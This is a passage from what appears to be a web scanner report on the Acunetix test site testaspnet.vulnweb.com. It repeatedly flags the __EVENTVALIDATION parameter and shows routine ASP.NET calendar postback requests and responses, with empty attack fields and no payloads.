Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1121 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,121 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8621&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgAAG5NrmNsIZGRkKuDuL02udpi4Wf26CxyxdW41pr0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLsp7uCBAKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogak7Y%2Fs1tixzhw8CR8Ie7uyn9N7VA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:28:51 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgAAG5NrmNsIZGRkKuDuL02udpi4Wf26CxyxdW41pr0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLsp7uCBAKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogak7Y/s1tixzhw8CR8Ie7uyn9N7VA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:White" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1135 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,135 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8443&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgCAkxWMDNsIZGRkNY2Ii1O25YT2JTxy2z2s9WF2J6U%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLSzuXWCgLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBRHYJT7DI9%2BUK8O65ljBtl3su2Lj
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:22:00 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgCAkxWMDNsIZGRkNY2Ii1O25YT2JTxy2z2s9WF2J6U=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLSzuXWCgLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBRHYJT7DI9+UK8O65ljBtl3su2Lj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:White" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
